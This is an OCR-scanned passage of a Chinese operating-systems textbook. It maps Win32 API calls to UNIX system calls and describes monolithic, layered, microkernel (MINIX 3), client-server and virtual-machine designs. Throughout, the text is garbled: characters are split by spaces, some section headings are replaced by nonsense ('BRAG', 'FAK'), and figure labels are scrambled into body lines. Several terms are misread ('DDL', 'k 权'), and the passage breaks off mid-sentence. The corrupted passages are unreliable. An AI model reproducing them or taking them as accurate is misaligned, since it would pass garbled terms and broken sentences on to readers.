系统 调用 不 对 应 ， 微 软 保留 了 随 着 时 间 (甚至 随 着 版 本 到 版 本 ) 改变 实际 系统 调用 的 能 力 ， 防 止 已 有 的 
程序 失效 。 由 于 最 新 几 版 Windows 中 有 许多 过 去 没有 的 新 调用 ， 所 以 究竟 Win32 是 由 什么 构成 的 ， 这 个 
问题 的 答案 仍然 是 含混 不 清 的 。 在 本 小 节 中 ，Win32 表 示 所 有 Windows 版 本 都 支持 的 接口 。Win32 提 供 
各 Windows 版 本 的 兼容 性 。 

Win32 API 调用 的 数量 是 非常 大 的 ， 有 数 千 个 。 此 外 ， 尽 管 其 中 许多 确实 涉及 系统 调用 ， 但 有 一 大 
批 Win32 API 完 全 是 在 用 户 空间 进行 的 。 结 果 ， 在 Windows 中 , 不 可 能 了 解 哪 一 个 是 系统 调用 (如 由 内 
核 完 成 )， 哪 一 个 只 是 用 户 空 间 中 的 库 调用 。 事 实 上 ， 某 个 版 本 中 的 一 个 系统 调用 ， 会 在 另 一 个 不 同 版 
本 的 用 户 空 间 中 执行 ， 或 者 相反 。 当 我 们 在 本 书 中 讨论 Windows 的 系统 调用 时 ， 将 使 用 Win32 过 程 (在 
合适 之 处 ) ， 这 是 因为 微软 保证 : 随 着 时 间 流 逝 ，Win32 过 程 将 保持 稳定 。 但 是 读者 有 必要 记 住 ， 它 们 并 
不 全 都 是 系统 调用 ( 即 陷入 内 核 中 )。 

Win32 API 中 有 大 量 的 调用 ， 用 来 管理 视窗 、 几 何 图 形 、 文 本 、 字 体 、 滚 动 条 、 对 话 框 、 菜 单 以 及 
GUI 的 其 他 功能 。 为 了 使 图 形 子 系统 在 内 核 中 运行 ( 某 些 Windows 版 本 中 确实 是 这 样 ， 但 不 是 所 有 的 版 
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本 ) ， 需 要 系统 调用 ， 否 则 只 有 库 调 用 。 在 本 书 中 是 否 应 该 讨论 这 些 调用 呢 ? 由 于 它们 与 操作 系统 的 功 
能 并 不 相关 ， 我 们 还 是 决定 不 讨论 它们 ， 尽 管 它们 会 在 内 核 中 运行 。 对 Win32 API 有 兴趣 的 读者 应 该 参 
阅 一 些 书籍 中 的 有 关内 容 (例如 ，Hart，1997; Rector 和 Newcomer,，1997; Simon，1997)。 

我 们 在 这 里 介绍 所 有 的 Win32 API， 不 过 这 不 是 我 们 关心 的 主要 问题 ， 所 以 做 了 一 些 限 制 ， 只 将 那 
些 与 图 1-18 中 UNIX 系 统 调用 大 致 对 应 的 Windows 调 用 列 在 图 1-23 中 。 













































































UNIX Win32 说 W 
fork CreateProcess 创建 一 个 新 进程 
waitpid | WaitForSingleObject| ”等 待 一 个 进程 退出 
execve | (none) a CreateProcess = fork + execve 23 
exit ExitProcess 终止 执行 
open CreateFile 创建 一 个 文件 或 打开 一 个 已 有 的 文件 
close | CloseHandle 关闭 一 个 文件 
read ReadFile 从 一 个 文件 读数 据 
write WriteFile 把 数据 写 入 一 个 文件 
lseek | SetFilePointer 移动 文件 指针 
stat GetFileAttributesEx | ”取得 文件 的 属性 
mkdir | CreateDirectory | 创建 一 个 新 目录 
| rmdir | RemoveDirectory 删除 一 个 空 目 录 
link (none) Win32 不 支持 link 
unlink | DeleteFile 销毁 一 个 已 有 的 文件 
mount | (none) Win32 不 支持 mount 
umount | (none) Win32 不 支持 umount 
chdir SetCurrentDirectory | ”改变 当前 工作 目录 
chmod | (none) Win32 不 支持 安全 性 (但 NT 支持 ) 
kill (none) Win32 不 支持 信号 
time | GetLocalTime 获得 当前 时 间 J 








图 1-23 与 图 1-18 中 UNIX 调 用 大 致 对 应 的 Win32 API 调用 


下 面 简 要 地 说 明 一 下 图 1-23 中 的 内 容 。CreateProcess 用 于 创建 一 个 新 进程 ， 它 把 UNIX 中 的 fork 
和 execve 结 合 起 来 。 它 有 许多 参数 用 来 指定 新 创建 进程 的 性 质 。Windows 中 没有 类 似 UNIX 中 的 进程 层 
次 ， 所 以 不 存在 父 进 程 和 子 进 程 的 概念 。 在 进程 创建 之 后 ， 创 建 者 和 被 创建 者 是 平等 的 。 
WaitForSingleObject 用 于 等 待 一 个 事件 ， 等 待 的 事件 可 以 是 多 种 可 能 的 事件 。 如 果 有 参数 指定 了 某 个 
进程 ， 那 么 调用 者 等 待 所 指定 的 进程 退出 ， 这 通过 使 用 ExitProcess 完 成 。 

接 下 来 的 6 个 调用 进行 文件 操作 ， 在 功能 上 和 UNIX 的 对 应 调用 类 似 ， 而 在 参数 和 细节 上 是 不 同 的 。 
和 UNIX 中 一 样 ， 文 件 可 被 打开 、 关 闭 和 写 入 。SetFilePointer 以 及 GetFileAttributesEx 调 用 设置 文件 的 
位 置 并 取得 文件 的 属性 。 

Windows 中 有 目录 ， 目 录 分 别 用 CreateDirectory 以 及 RemoveDirectory API 调 用 创建 和 删除 。 也 有 
对 当前 目录 的 标记 ， 这 可 以 通过 SetCurrentDirectory 来 设置 。 使 用 GetLocalTime 可 获得 当前 时 间 。 

Win32 接 口中 没有 文件 的 链接 、 文 件 系统 的 安装 、 安 全 属性 或 信号 ， 所 以 对 应 于 UNIX 中 的 这 些 调 
用 就 不 存在 了 。 当 然 ，Win32 中 也 有 大 量 UNIX 中 不 存在 的 其 他 调用 ， 特 别 是 管理 GUI 的 各 种 调用 。 在 
Windows Vista 中 有 了 精心 设计 的 安全 系统 ， 而 且 支 持 文件 的 链接 。Windows 7 和 Windows 8 也 加 入 了 更 
多 特性 和 系统 调用 。 

也 许 有 必要 对 Win32 做 最 后 的 说 明 。Win32 并 不 是 一 个 非常 统一 的 或 一 致 的 接口 。 其 主要 原因 是 
Win32 需 要 与 早期 的 在 Windows 3.x 中 使 用 的 16 位 接口 向 后 兼容 。 


1.7 操作 系统 结构 
我 们 已 经 分 析 了 操作 系统 的 外 部 (如 程序 员 接 口 )， 现 在 是 分 析 其 内 部 的 时 候 了 。 在 下 面 的 小 节 中 ， 
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为 了 对 各 种 可 能 的 方式 有 所 了 解 ， 我 们 将 考察 已 经 尝试 过 的 六 种 不 同 的 结构 设计 。 这 样 做 并 没有 涵盖 各 
种 结构 方式 ， 但 是 至 少 给 出 了 在 实践 中 已 经 试验 过 的 一 些 设计 思想 。 我 们 将 讨论 的 这 六 种 设计 包括 单 体 
系统 、 层 次 式 系统 、 微 内 核 、 客 户 端 - 服 务 器 模式 、 虚 拟 机 和 外 核 等 。 


1.7.1 BRAG 

到 目前 为 止 ， 在 大 多 数 常见 的 组 织 中 ， 整 个 操作 系统 在 内 核 态 以 单一 程序 的 方式 运行 。 整 个 操作 系 
统 以 过 程 集合 的 方式 编写 ， 链 接 成 一 个 大 型 可 执行 二 进 制程 序 。 使 用 这 种 技术 ， 系 统 中 每 个 过 程 可 以 自 
由 调用 其 他 过 程 ， 只 要 后 者 提供 了 前 者 所 需要 的 一 些 有 用 的 计算 工作 。 调 用 任何 一 个 你 所 需要 的 过 程 或 
许 会 非常 高 效 ， 但 上 千 个 可 以 不 受 限 制 地 彼此 调用 的 过 程 常常 导致 系统 笨拙 且 难 于 理解 。 并 且 ， 任 何 一 
个 过 程 的 崩溃 都 会 连累 整个 系统 。 

在 使 用 这 种 处 理 方式 构造 实际 的 目标 程序 时 , 首先 编译 所 有 单个 的 过 程 , 或 者 编译 包含 过 程 的 文件 ， 
然后 通过 系统 链接 程序 将 它们 链接 成 单一 的 目标 文件 。 依 靠 对 信息 的 隐藏 处 理 ， 不 过 在 这 里 实际 上 是 不 
存在 的 ， 每 个 过 程 对 其 他 过 程 都 是 可 见 的 (相反 ， 构 造 中 有 模块 或 包 ， 其 中 多 数 信息 隐藏 在 模块 之 中 ， 
而 且 只 能 通过 正式 设计 的 入 口 点 实现 模块 的 外 部 调用 )。 

但 是 ， 即 使 在 单 体系 统 中 ， 也 可 能 有 一 些 结构 存在 。 可 以 将 参数 放置 在 良好 定义 的 位 置 (如 栈 )， 
通过 这 种 方式 ， 向 操作 系统 请 求 所 能 提供 的 服务 (系统 调用 )， 然 后 执行 一 个 陷阱 指令 。 这 个 指令 将 机 
器 从 用 户 态 切 换 到 内 核 态 并 把 控制 传递 给 操作 系统 ， 如 图 1-17 中 第 6 步 所 示 。 然 后 ， 操 作 系 统 取 出 参数 
并 且 确 定 应 该 执行 哪 一 个 系统 调用 。 随 后 ， 它 在 一 个 表格 中 检索 ， 在 该 表格 的 k 权 中 存放 着 指向 执行 系 
统 调用 k 过 程 的 指针 (图 1-17 中 第 7 步 )。 

对 于 这 类 操作 系统 的 基本 结构 ， 有 着 如 下 结构 上 的 建议 : 

1) 需要 一 个 主 程序 ， 用 来 处 理 服 务 过 程 请 求 。 

2) 需要 一 套 服务 过 程 ， 用 来 执行 系统 调用 。 

3) 需要 一 套 实用 过 程 ， 用 来 辅助 服务 过 程 。 
在 该 模型 中 ， 每 一 个 系统 调用 都 通过 一 个 服务 
过 程 为 其 工作 并 运行 之 。 要 有 一 组 实用 程序 来 
完成 一 些 服 务 过 程 所 需要 用 到 的 功能 ， 如 从 用 
户 程 序 取 数 据 等 。 可 将 各 种 过 程 划 分 为 一 个 三 
层 的 模型 ， 如 图 1-24 所 示 。 

除了 在 计算 机 初 启 时 所 装载 的 核心 操作 系 
统 外 ， 许 多 操作 系统 支持 可 装载 的 扩展 ， 诸 如 图 1-24 简单 的 单 体系 统 结构 模型 
IO 设备 驱动 和 文件 系统 。 这 些 部 件 可 以 按照 需 
要 载 和 人。 在 UNIX 中 它们 被 叫 作 共享 库 (shared library) ， 在 Windows 中 则 被 称 为 动态 链接 库 (Dynamic- 
Link Library，DLL)。 它 们 的 扩展 类 型 为 .dll， 在 C:\Windows\system32 目 录 下 存在 1000 多 个 DDL 文 件 。 


1.7.2 层次 式 系 统 
把 图 1-24 中 的 系统 进一步 通用 化 ， 就 变 成 一 个 层次 式 结构 的 操作 系统 ， 它 的 上 层 软件 都 是 在 下 一 层 
软件 的 基础 之 上 构建 的 。E. W. Dijkstra 和 他 的 学 生 在 荷兰 的 Eindhoven 技 术 学 院 所 开发 的 THE 系 统 (1968) , 
是 按 此 模型 构造 的 第 一 个 操作 系统 。THE 系 统 是 为 荷兰 的 一 种 计算 机 Electrologica X8 配 备 的 一 个 简单 的 
批 处 理 系统 ， 其 内 存 只 有 32K 个 字 ， 每 字 27 位 ( 那 时 二 进 制 位 是 很 昂贵 的 ) 。 
该 系统 共 分 为 六 层 ， 如 图 1-25 所 示 。 处 理 
































器 分 配 在 第 0 层 中 进行 ， 当 中 断 发 生 或 定时 器 aS ET 功 能 

到 期 时 ， 由 该 层 进行 进程 切换 。 在 第 0 层 之 上 ， ME 

系统 由 一 些 连续 的 进程 所 组 成 ， 编 写 这 些 进程 3 | ”输入 /输出 管理 ] 
时 不 用 再 考虑 在 单 处 理 器 上 多 进程 运行 的 细 2 | ”操作 员 - 进 程 通信 

节 。 也 就 是 说 ， 在 第 0 层 中 提供 了 基本 的 CPU 1 存储 器 和 磁 鼓 管理 

多 道 程序 设计 功能 。 0 处 理 器 分 配 和 多 道 程 序 设 计 








内 存 管 理 在 第 1 层 中 进行 ， 它 分 配 进程 的 图 1-25 THE 操 作 系统 的 结构 
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主 存 空间 ， 当 内 存 用 完 时 则 在 一 个 512K 字 的 磁 鼓 上 保留 进程 的 一 部 分 (页面 )。 在 第 1 层 上 ， 进 程 不 用 
考虑 它 是 在 磁 鼓 上 还 是 在 内 存 中 运行 。 第 1 层 软 件 保证 一 旦 需要 访问 某 一 页 面 ， 该 页 面 必 定 已 在 内 存 中 ， 
并 在 页 面 不 再 需要 时 将 其 移出 。 

第 2 层 处 理 进程 与 操作 员 控制 台 (MAA) 之 间 的 通信 。 在 这 层 的 上 部 ， 可 以 认为 每 个 进程 都 有 自 
己 的 操作 员 控 制 台 。 第 3 层 管理 IO 设备 和 相关 的 信息 流 缓冲 区 。 在 第 3 层 上 ， 每 个 进程 都 与 有 良好 特性 
的 抽象 1O 设 备 打 交道 ， 而 不 必 考 虑 外 部 设备 的 物理 细节 。 第 4 层 是 用 户 程序 层 。 用 户 程序 不 用 考虑 进程 、 
内 存 、 控 制 台 或 1O 设 备 管理 等 细节 。 系 统 操作 员 进 程 位 于 第 5 层 中 。 

在 MULTICS 系 统 中 采用 了 更 进一步 的 通用 层次 化 概念 。MULTICS 由 许多 的 同心 环 构造 而 成 ， 而 不 
是 采用 层次 化 构造 ， 内 环比 外 环 有 更 高 的 级 别 〈 它 们 实际 上 是 一 样 的 ) 。 当 外 环 的 过 程 欲 调用 内 环 的 过 
程 时 ， 它 必须 执行 一 条 等 价 于 系统 调用 的 TRAP 指 令 。 在 执行 该 TRAP 指 令 前 ， 要 进行 严格 的 参数 合法 
性 检查 。 在 MULTICS 中 ， 尽 管 整个 操作 系统 是 各 个 用 户 进程 的 地 址 空间 的 一 部 分 ， 但 是 硬件 仍 能 对 单 
个 过 程 (实际 是 内 存 中 的 一 个 段 ) 的 读 、 写 和 执行 进行 保护 。 

实际 上 ，THE 分 层 方案 只 是 为 设计 提供 了 一 些 方便 ， 因 为 该 系统 的 各 个 部 分 最 终 仍然 被 链接 成 了 完 
整 的 单个 目标 程序 。 而 在 MULTICS 里 ， 环 形 机 制 在 运行 中 是 实际 存在 的 ， 而 且 是 由 硬件 实现 的 。 环 形 
机 制 的 一 个 优点 是 很 容易 扩展 ， 可 用 以 构造 用 户 子 系统 。 例 如 ， 在 一 个 MULTICS 系 统 中 ， 教 授 可 以 写 
一 个 程序 检查 学 生 编 写 的 程序 并 给 他 们 打分 ， 在 第 n 个 环 中 运行 教授 的 程序 ， 而 在 第 n+1 个 环 中 运行 学 生 
的 程序 ， 这 样 学 生 就 无 法 算 改 教授 所 给 出 的 成 绩 。 


1.7.3 FAK 

在 分 层 方式 中 ， 设 计 者 要 确定 在 哪里 划分 内 核 一 用 户 的 边界 。 传 统 上 ， 所 有 的 层 都 在 内 核 中 ， 但 是 
这 样 做 没有 必要 。 事 实 上 ， 尽 可 能 减少 内 核 态 中 功能 的 做 法 更 好 ， 因 为 内 核 中 的 错误 会 快速 拖累 系统 。 
相反 ， 可 以 把 用 户 进程 设置 为 具有 较 小 的 权限 ， 这 样 ， 某 个 错误 的 后 果 就 不 会 是 致命 的 。 

有 不 少 研究 人 员 对 每 千 行 代码 中 错误 的 数量 进行 了 分 析 (例如 ，Basilli 和 Perricone，1984，Ostrand 
和 Weyuker，2002) 。 代 码 错误 的 密度 取决 于 模块 大 小 、 模 块 寿命 等 ， 不 过 对 一 个 实际 工业 系统 而 言 ， 每 
千 行 代 码 中 会 有 2~ 10 个 错误 。 这 意味 着 在 有 500 万 行 代码 的 单 体操 作 系 统 中 ， 大 约 有 10 000~50 000 个 
内 核 错误 。 当 然 ， 并 不 是 所 有 的 错误 都 是 致命 的 ， 诸 如 给 出 了 不 正确 的 故障 信息 之 类 的 某 些 错误 ， 实 际 
是 很 少 发 生 的 。 无 论 怎 样 看 ， 操 作 系 统 中 充满 了 错误 ， 所 以 计算 机 制造 商 设置 了 复位 按钮 (通常 在 前 面 
板 上 ) ， 而 电视 机 、 立 体 音 响 以 及 汽车 的 制造 商 则 不 这 样 做 ， 尽 管 在 这 些 装 置 中 也 有 大 量 的 软件 。 

在 微 内 核 设计 背后 的 思想 是 ， 为 了 实现 高 可 靠 性 ， 将 操作 系统 划分 成 小 的 、 良 好 定义 的 模块 ， 只 有 
其 中 一 个 模块 一 一 微 内 核 一 一 运行 在 内 核 态 ， 其 余 的 模块 由 于 功能 相对 弱 些 ， 则 作为 普通 用 户 进程 运行 。 
特别 地 ， 由 于 把 每 个 设备 驱动 和 文件 系统 分 别 作为 普通 用 户 进程 ， 这 些 模块 中 的 错误 虽然 会 使 这 些 模 块 
崩溃 ， 但 是 不 会 使 得 整个 系统 死机 。 所 以 ， 音 频 驱 动 中 的 错误 会 使 声音 断 续 或 停止 ， 但 是 不 会 使 整个 计 
算 机 垮 掉 。 相 反 ， 在 单 体系 统 中 ， 由 于 所 有 的 设备 驱动 都 在 内 核 中 ， 一 个 有 故障 的 音频 驱动 很 容易 引起 
对 无 效 地 址 的 引用 ， 从 而 造成 恼人 的 系统 立即 停机 。 

有 许多 微 内 核 已 经 被 实现 并 应 用 了 数 十 年 (Haertig 等 人 ，1997; Heiser 等 人 ，2006，Herder 等 人 ， 
2006; Hildebrand, 1992; Kirsch 等 人 ，2005; Liedtke，1993，1995，1996; Pike 等 人 ，1992; Zuberi 
等 人 ，1999)。 除 了 基于 Mach 微 内 核 (Accetta 等 人 ，1986) 的 OS X 外 ,通常 的 桌面 操作 系统 并 不 使 用 
微 内 核 。 然 而 ， 微 内 核 在 实时 、 工 业 、 航 空 以 及 军事 应 用 中 特别 流行 ， 这 些 领域 都 是 关键 任务 ， 需 要 有 
高 度 的 可 靠 性 。 知 名 的 微 内 核 有 Integrity、K42、L4、PikeOS、QNX、Symbian， 以 及 MINIX 3 等 。 这 里 
对 MINIX 3 做 一 简单 的 介绍 ， 该 操作 系统 把 模块 化 的 思想 推 到 了 极致 ， 它 将 大 部 分 操作 系统 分 解 成 许多 
独立 的 用 户 态 进程 。MINIX 3 遵守 POSIX， 可 在 www.minix3.org (Giuffrida 等 人 ，2012，Giuffrida 等 人 ， 
2013，Herder 等 人 ，2006，Herder 等 人 ，2009;，Hruby 等 人 ，2013) 站 点 获得 免费 的 开放 源 代码 。 

MINIX 3 微 内 核 只 有 12 000 行 C 语 言 代 码 和 1400 行 用 于 非常 低层 次 功能 的 汇编 语言 代码 ， 诸 如 捕获 
中 断 、 进 程 切 换 等 。C 代 码 管理 和 调度 进程 、 处 理 进程 间 通 信 (在 进程 之 间 传 送信 息 ) 、 提 供 大 约 40 个 内 
核 调用 ， 它 们 使 得 操作 系统 的 其 余部 分 可 以 完成 其 工作 。 这 些 调用 完成 诸如 连接 中 断 句 柄 、 在 地 址 空间 
中 移动 数据 以 及 为 新 创建 的 进程 安装 新 的 内 存 映 像 等 功能 。MINIX 3 的 进程 结构 如 图 1-26 所 示 ， 其 中 内 
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核 调用 句柄 用 Sys 标 记 。 时 钟 设备 驱动 也 在 内 核 中 ， 因 为 这 个 驱动 与 调度 器 交互 密切 。 所 有 的 其 他 设备 
驱动 都 作为 单独 的 用 户 进程 运行 
进程 
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图 1-26 MINIX 3 系统 的 结构 


在 内 核 的 外 部 ， 系 统 的 构造 有 三 层 进程 ， 它 们 都 在 用 户 态 运行 。 最 底层 中 包含 设备 驱动 器 。 由 于 它 
们 在 用 户 态 运 行 ， 所 以 不 能 物理 地 访问 IO 端口 空间 ， 也 不 能 直接 发 出 MO 命令 。 相 反 ， 为 了 能 够 对 IO 设 
备 编程 ， 驱 动 器 构建 了 一 个 结构 ， 指 明 哪个 参数 值 写 到 哪个 IO 端口 ， 并 生成 一 个 内 核 调 用 ， 通 知 内 核 
完成 写 操作 。 这 个 处 理 意味 着 内 核 可 以 检查 驱动 正在 对 IO 的 读 (或 写 ) 是 否 是 得 到 授权 使 用 的 。 这 样 ， 
(与 单 体 设计 不 同 ) 一 个 有 错误 的 音频 驱动 器 就 不 能 够 偶发 性 地 在 硬盘 上 进行 写 操作 。 

在 驱动 器 上 面 是 另 一 用 户 态 层 ， 包 含有 服务 器 ， 它 们 完成 操作 系统 的 多 数 工作 。 由 一 个 或 多 个 文件 
服务 器 管理 着 文件 系统 ， 进 程 管 理 器 创建 、 销 般 和 管理 进程 等 。 通 过 给 服务 器 发 送 短 消息 请 求 POSIX 系 
统 调用 的 方式 ， 用 户 程序 获得 操作 系统 的 服务 。 例 如 ， 一 个 需要 调用 read 的 进程 发 送 一 个 消息 给 某 个 文 
件 服务 器 ， 告 知 它 需要 读 什么 内 容 。 

有 一 个 有 趣 的 服务 器 ， 称 为 再 生 服 务 器 (reincarnation server) ， 其 任务 是 检查 其 他 服务 器 和 驱动 器 
的 功能 是 否 正 确 。 一 旦 检查 出 一 个 错误 ， 它 自动 取代 之 ， 无 须 任何 用 户 的 干预 。 这 种 方式 使 得 系统 具有 
自修 复 能 力 ， 并 且 获 得 了 较 高 的 可 靠 性 。 

系统 对 每 个 进程 的 权限 有 着 许多 限制 。 正 如 已 经 提 及 的 ， 设 备 驱 动 器 只 能 与 授权 的 IO 端口 接触 ， 
对 内 核 调 用 的 访问 也 是 按 单个 进程 进行 控制 的 ， 这 是 考虑 到 进程 具有 向 其 他 多 个 进程 发 送 消息 的 能 力 。 
进程 也 可 授予 有 限 的 许可 ， 让 内 核 的 其 他 进程 可 访问 其 地 址 空间 。 例 如 ， 一 个 文件 系统 可 以 给 磁盘 驱动 
器 有 限 的 许可 ， 让 内 核 在 该 文件 系统 的 地 址 空间 内 的 特定 地 址 上 进行 对 盘 块 的 读 和 操作。 总 体 来 说 ， 所 
有 这 些 限 制 是 让 每 个 驱动 和 服务 器 只 拥有 完成 其 工作 所 需要 的 权限 ， 这 样 就 极 大 地 限制 了 故障 部 件 可 能 
造成 的 危害 。 

一 个 与 小 内 核 相 关联 的 思想 是 内 核 中 的 机 制 与 策略 分 离 的 原则 。 为 了 更 清晰 地 说 明 这 一 点 ， 我 们 考 
虑 进程 调度 。 一 个 比较 简单 的 调度 算法 是 ， 对 每 个 进程 赋予 一 个 优先 级 ， 并 让 内 核 执行 具有 最 高 优先 级 
的 进程 。 这 里 ， 机 制 (在 内 核 中 ) 就 是 寻找 最 高 优先 级 的 进程 并 运行 之 。 而 策略 (赋予 进程 优先 级 ) 可 
以 由 用 户 态 中 的 进程 完成 。 在 这 种 方式 中 ， 机 制 和 策略 是 分 离 的 ， 从 而 使 系统 内 核 变 得 更 小 。 


1.7.4 客户 端 -服务 器 模式 

一 个 微 内 核 思想 的 略微 变 体 是 将 进程 划分 为 两 类 : 服务 器 ， 每 个 服务 器 提供 某 种 服务 ， 客 户 端 ， 使 
用 这 些 服 务 。 这 个 模式 就 是 所 谓 的 客户 端 -服务 器 模式 。 通 常 ， 在 系统 最 底层 是 微 内 核 ， 但 并 不 是 必须 
这 样 。 这 个 模式 的 本 质 是 存在 客户 端 进程 和 服务 器 进程 。 

一 般 来 说 ,客户 端 和 服务 器 之 间 的 通信 是 消息 传递 。 为 了 获得 一 个 服务 ,客户 端 进程 构造 一 段 消息 ， 
说 明 所 需要 的 服务 ， 并 将 其 发 给 合适 的 服务 器 。 该 服务 器 完成 工作 ， 发 送 回应 。 如 果 客 户 端 和 服务 器 恰 
巧 运行 在 同一 个 机 器 上 ， 则 有 可 能 进行 某 种 优化 ， 但 是 从 概念 上 看 ， 这 里 讨论 的 是 消息 传递 。 

这 个 思想 的 一 个 显然 的 普遍 方式 是 ， 客 户 端 和 服务 器 运行 在 不 同 的 计算 机 上 ， 它 们 通过 局 域 网 或 
广域网 连接 ， 如 图 1-27 所 示 。 由 于 客户 端 通过 发 送 消息 与 服务 器 通信 ， 客 户 端 并 不 需要 知道 这 些 消息 
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是 在 本 地 机 器 上 处 理 ， 还 是 通过 网 络 被 送 到 远程 机 器 上 处 理 。 对 于 客户 端 而 言 ， 这 两 种 情形 是 一 样 
的 : 都 是 发 送 请 求 并 得 到 回应 。 所 以 ， 客 户 端 - 服 务 器 模式 是 一 种 可 以 应 用 在 单机 或 者 网 络 机 器 上 的 
抽象 。 

越 来 越 多 的 系统 ， 包 括 用 户 家 里 的 PC， 都 成 为 客户 端 ， 而 在 某 地 运行 的 大 型 机 器 则 成 为 服务 器 。 
事实 上 ， 许 多 Web 就 是 以 这 个 方式 运行 的 。 一 台 PC 向 某 个 服务 器 请 求 一 个 Web 页 面 ， 而 后 ， 该 Web 页 面 
回 送 。 这 就 是 网 络 中 客户 端 - 服 务 器 的 典型 应 用 方式 。 


机 器 1 机 器 2 机 器 3 机 器 4 


进程 服务 器 终端 服务 器 





消息 从 客户 端 
到 服务 器 


图 1-27 在 网 络 上 的 客户 端 -服务 器 模型 


1.7.5 虚拟 机 

OS /360 的 最 早 版 本 是 纯粹 的 批 处 理 系统 。 然 而 ， 有 许多 360 用 户 希 望 能 够 在 终端 上 交互 工作 ， 于 
是 IBM 公 司 内 外 的 一 些 研究 小 组 决定 为 它 编写 一 个 分 时 系统 。 后 来 推出 了 正式 的 IBM 分 时 系统 TSS /360。 
但 是 它 非 常 庞 大 ， 运 行 缓慢 ， 于 是 在 花费 了 约 5000 万 美元 的 研制 费用 后 ， 该 系统 最 后 被 弃 之 不 用 
(Graham，1970)。 但 是 在 位 于 麻 省 剑桥 的 BM 研究 中 心 开发 了 另 一 个 完全 不 同 的 系统 ， 这 个 系统 最 终 被 
IBM 用 作 产 品 。 它 的 直接 后 代 ， 称 为 zVM， 目 前 在 IBM 的 大 型 机 上 广泛 使 用 ，zSeries 则 在 大 型 公司 的 数 
据 中 心 广泛 使 用 ， 例 如 ， 作 为 电子 商务 服务 器 ， 它 们 每 秒 可 以 处 理 成 百 上 千 个 事务 ， 并 使 用 规模 达 数 百 
万 GB 的 数据 库 。 

1. VM/370 

这 个 系统 最 初 被 命名 为 CP/CMS ， 后 来 改名 为 VM/370 (Seawright#MacKinnon, 1979 )。 它 是 源 于 
如 下 机 敏 的 观察 ， 即 分 时 系统 应 该 提供 这 些 功 能 : (1) 多 道 程序 ，(2) 一 个 比 裸 机 更 方便 的 、 有 扩展 界 
面 的 计算 机 。VM /370 存 在 的 目的 是 将 二 者 彻底 地 隔离 开 来 。 

这 个 系统 的 核心 称 为 虚拟 机 监控 程序 (virtual machine monitor) ， 它 在 裸 机 上 运行 并 且 具 备 了 多 道 
程序 功能 。 该 系统 向 上 层 提 供 了 若干 台 虚 拟 M 
机 ， 如 图 1-28 所 示 。 它 不 同 于 其 他 操作 系统 i i 
的 地 方 是 ， 这 些 虚拟 机 不 是 那 种 具有 文件 等 
优良 特征 的 扩展 计算 机 。 与 之 相反 ， 它 们 仅 RUS ANE MCE S| 
仅 是 裸 机 硬件 的 精确 复制 品 。 这 个 复制 品 包 
含 了 内 核 态 /用 户 态 、L/O 功 能 、 中 断 及 其 他 
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真实 硬件 所 应 该 具有 的 全 部 内 容 。 Pone. 
由 于 每 台 虚 拟 机 都 与 裸 机 相同 ， 所 以 在 图 1-28 配 有 CMS 的 VM/370 结 构 


每 台 虚 拟 机 上 都 可 以 运行 一 台 裸 机 所 能 够 运 
行 的 任何 类 型 的 操作 系统 。 不 同 的 虚拟 机 可 以 运行 不 同 的 操作 系统 ， 而 且 实际 上 往往 就 是 如 此 。 在 早期 
的 VM/370 系 统 上 ， 有 一 些 系 统 运行 OS / 360 或 者 其 他 大 型 批 处 理 或 事务 处 理 操作 系统 ， 而 另 一 些 虚拟 机 
运行 单 用 户 、 交 互 式 系统 供 分 时 用 户 使 用 ,这 个 系统 称 为 会 话 监控 系统 (Conversational Monitor System, 
CMS)。 后 者 在 程序 员 中 很 流行 。 

当 一 个 CMS 程序 执行 系统 调用 时 ， 该 调用 被 陷 人 到 其 虚拟 机 的 操作 系统 上 ， 而 不 是 VM/370 上 ， 似 
乎 它 运 行 在 实际 的 机 器 上 ， 而 不 是 在 虚拟 机 上 。CMS 然 后 发 出 普通 的 硬件 IO 指令 读 出 虚拟 磁盘 或 其 他 需 
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要 执行 的 调用 。 这 些 IO 指 令 由 VM/370 陷 入 ， 然 后 ， 作 为 对 实际 硬件 模拟 的 一 部 分 ，VM/370 完 成 指令 。 
通过 对 多 道 程序 功能 和 提供 扩展 机 器 二 者 的 完全 分 离 ， 每 个 部 分 都 变 得 非常 简单 、 非 常 灵活 且 容 易 维护 。 

虚拟 机 的 现代 化 身 z/VM 通 常用 于 运行 多 个 完整 的 操作 系统 ， 而 不 是 简化 成 如 CMS 一 样 的 单 用 户 系 
统 。 例 如 ，zSeries 有 能 力 与 传统 的 IBM 操 作 系统 一 起 ， 运 行 一 个 或 多 个 Linux 虚 拟 机 。 

2. 虚拟 机 的 再 次 发 现 

IBM 拥 有 虚拟 机 产品 已 经 有 40 年 了 ， 而 少数 公司 ， 包 括 Oracle 公 司 和 Hewlett-Packard 公 司 等 ， 近 来 
也 在 其 高 端 企业 服 务 器 上 增加 对 虚拟 机 的 支持 ， 在 PC 上 ， 直 到 最 近 之 前 ， 虚 拟 化 的 思想 在 很 大 程度 上 被 
忽略 了 。 不 过 近年 来 ， 新 的 需求 、 新 的 软件 和 新 的 技术 已 经 使 得 虚拟 机 成 为 热点 。 

首先 看 需求 。 传 统 上 ， 许 多 公司 在 不 同 的 计算 机 上 ， 有 时 还 在 不 同 的 操作 系统 上 ， 运 行 其 邮件 服务 
器 、Web 服 务 器 、FTP 服 务 器 以 及 其 他 服务 器 。 他 们 看 到 可 以 在 同一 台 机 器 上 实现 虚拟 化 来 运行 所 有 的 
服务 器 ， 而 不 会 由 于 一 个 服务 器 崩溃 影响 其 他 系统 。 

虚拟 化 在 Web 托 管 世界 里 也 很 流行 。 没 有 虚拟 化 ，Web 托 管 客户 端 只 能 共享 托管 (在 Web 服 务 器 上 
给 客户 端 一 个 账号 ， 但 是 不 能 控制 整个 服务 器 软件 ) 以 及 独占 托管 (提供 给 客户 端 整个 机 器 ， 这 样 虽然 
很 灵活 ， 但 是 对 于 小 型 或 中 型 Web 站 点 而 言 ， 成 本 效益 比 不 高 )。 当 Web 托 管 公司 提供 租用 虚拟 机 时 ， 一 
台 物 理 机 器 就 可 以 运行 许多 虚拟 机 ， 每 个 虚拟 机 看 起 来 都 是 一 台 完 全 的 机 器 。 租 用 虚拟 机 的 客户 端 可 以 
运行 自己 想 使 用 的 操作 系统 和 软件 ， 但 是 只 需 支付 独占 一 台 机 器 的 几 分 之 一 的 费用 (因为 一 台 物 理 机 器 
可 以 同时 支持 多 台 虚 拟 机 ) 。 

虚拟 化 的 另外 一 个 用 途 是 ， 为 希望 同时 运行 两 个 或 多 个 操作 系统 (比如 Windows 和 Linux) 的 最 终 用 户 服 
